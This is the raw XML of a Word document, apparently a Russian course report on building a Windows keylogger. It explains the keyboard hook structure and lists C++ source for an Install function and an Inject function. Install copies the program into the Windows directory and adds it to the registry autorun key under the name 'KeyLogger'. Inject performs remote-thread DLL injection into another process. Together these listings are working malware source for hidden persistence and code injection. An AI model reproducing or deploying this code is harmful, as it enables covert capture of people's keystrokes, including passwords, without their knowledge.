        <w:t>Структура KBDLLHOOKSTRUCT содержит информацию о низкоуровневом событии ввода данных с клавиатуры.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>typedef struct {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DWORD  vkCode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DWORD  scanCode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DWORD  flags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DWORD  time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ULONG_PTR  dwExtraInfo;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="00C949A2" w:rsidRDefault="00984B5C" w:rsidP="00984B5C">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C949A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>} KBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="00984B5C" w:rsidRDefault="00B709E0" w:rsidP="00712C5A">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00C949A2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vkCode</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>устанавливает</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>код</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>виртуальной</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>клавиши</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Код должен быть значением в диапазоне 1 - 254.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="00984B5C" w:rsidRDefault="00B709E0" w:rsidP="00712C5A">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>scanCode устанавливает аппаратный код опроса</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> клавиатуры (скэн-код) клавиши.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00B709E0" w:rsidP="00712C5A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WORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lags устанавливает флажок дополнительной клавиши, флажок события ввода, контекстный код и флажок переходного состояния.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="00984B5C" w:rsidRDefault="00B709E0" w:rsidP="00712C5A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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00712C5A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00712C5A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ime у</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>станавливает отмет</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ку времени для этого сообщения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00B709E0" w:rsidP="00712C5A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LONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E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TR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dwExtraInfo</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>станавливает дополнительную информацию, связанную с сообщением.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B50CE" w:rsidRDefault="002B50CE" w:rsidP="00712C5A">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRDefault="00403476" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00403476">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.</w:t>
      </w:r>
      <w:r w:rsidR="000D413B" w:rsidRPr="00403476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Процедура </w:t>
      </w:r>
      <w:r w:rsidRPr="00403476">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">установки программы </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRPr="00891D34" w:rsidRDefault="00891D34" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891D3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установки приложения была разработана функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Install(char* injectionDllName)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. – копирует исполняемый файл и инжектируемую библиотеку в директорию операционной системы и устанавливает программу в автозагрузку</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Возвращает значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00891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спешной установке, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRDefault="00891D34" w:rsidP="00B709E0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jectionDllName</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имя инжектируемой библиотеки, которая должна находится рядом с исполняемым файлом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="002E7A2E" w:rsidRDefault="002E7A2E" w:rsidP="002E7A2E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3525"/>
        </w:tabs>
        <w:spacing w:before="240"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2E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Install</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="002E7A2E" w:rsidRDefault="002E7A2E" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:before="24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>bool Install(char* injectionDllName)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HKEY hk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char currentPath[MAX_PATH],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sysbuf[MAX_PATH],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*fileName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GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH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fileName = strrchr(currentPath, '\\'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GetWindowsDirectory(sysbuf, MAX_PATH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rcat(sysbuf, fileName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if (!CopyFile(currentPath, sysbuf, false))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95536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tab/>
      </w:r>
      <w:r w:rsidRPr="0095536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>std::cout &lt;&lt; "Error: Can't copy file:" &lt;&lt; std::endl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d::cout &lt;&lt; sysbuf &lt;&lt; std::endl;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95536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return false;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>if (ERROR_SUCCESS == RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &amp;hk))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RegSetValueEx(hk, "KeyLogger", 0, REG_SZ, (LPBYTE) sysbuf, strlen(sysbuf));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95536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RegCloseKey(hk);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d::cout &lt;&lt; "Error: Can't create RegKey." &lt;&lt; std::endl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GetModuleFileName(GetModuleHandle(NULL), currentPath, MAX_PATH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GetWindowsDirectory(sysbuf, MAX_PATH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rcpy(fileName, injectionDllName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rcat(sysbuf, fileName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if (!CopyFile(currentPath, sysbuf, false))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d::cout &lt;&lt; "Error: Can't copy file:" &lt;&lt; std::endl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d::cout &lt;&lt; sysbuf &lt;&lt; std::endl;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95536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>return false;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1D34" w:rsidRPr="0095536E" w:rsidRDefault="00891D34" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="0095536E" w:rsidRDefault="002E7A2E" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240"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2E7A2E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процедура</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536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инжекции</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536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библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="00B709E0" w:rsidRDefault="002E7A2E" w:rsidP="00891D34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екция библиотеки производится с помощью функции </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF" w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Inject(DWORD pId, char *dllName)</w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – функция открывает существующий объект процесса с </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификатором </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процесса</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pId</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Далее загружается адрес функции </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E" w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из динамической библиотеки </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E" w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После чего в открытом процессе выделяется память для инжектируемой библиотеки, и инжектируемая библиотека записывается в адресное пространство открытого процесса. Дистанционно создается новый поток в открытом процессе, выполняющий код инжектируемой библиотеки.</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">при успешной инжекции, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRDefault="00B709E0" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DWORD pId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – идентификатор процесса для инжекции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRDefault="00B709E0" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>char *dllName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – имя инжектируемой библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRDefault="00B709E0" w:rsidP="00B709E0">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto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95536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.4.1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Inject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>bool Inject(DWORD pId, char *dllName)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  <w:t>HANDLE h = OpenProcess(PROCESS_ALL_ACCESS, false, pId)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  <w:t>if (h)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LPVOID LoadLibAddr = (LPVOID) GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA")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if (LoadLibAddr == NULL) {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std::cout &lt;&lt; "Error: the LoadLibraryA function was not found inside kernel3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2.dll library.\n" &lt;&lt; std::endl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LPVOID dereercomp = VirtualAllocEx(h, NULL, strlen(dllName), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)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if (dereercomp == NULL) {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std::cout &lt;&lt; "Error: the memory could not be allocated inside the chosen process.\n" &lt;&lt; std::endl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int n = WriteProcessMemory(h, dereercomp, dllName, strlen(dllName), NULL)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if (n == 0) {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std::cout &lt;&lt; "Error: there was no bytes written to the process's address space.\n" &lt;&lt; std::endl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HANDLE asdc = CreateRemoteThread(h, NULL, NULL, (LPTHREAD_START_ROUTINE) LoadLibAddr, dereercomp, 0, NULL)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if (asdc == NULL) {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printf("Error: the remote thread could not be created.\n")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  <w:t>std::cout &lt;&lt; "Error: Can't open process:" &lt;&lt; pId &lt;&lt; std::endl;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="0095536E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  <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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95536E">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRPr="0095536E" w:rsidRDefault="0095536E" w:rsidP="00B709E0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B709E0" w:rsidRDefault="00B709E0" w:rsidP="00891D34">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5.5 </w:t>
      </w:r>
      <w:r w:rsidR="0095536E" w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процедура получения снимка процессов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRDefault="001000EB" w:rsidP="001000EB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ANDLE</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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API</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>olhelp</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB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Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="001000E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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
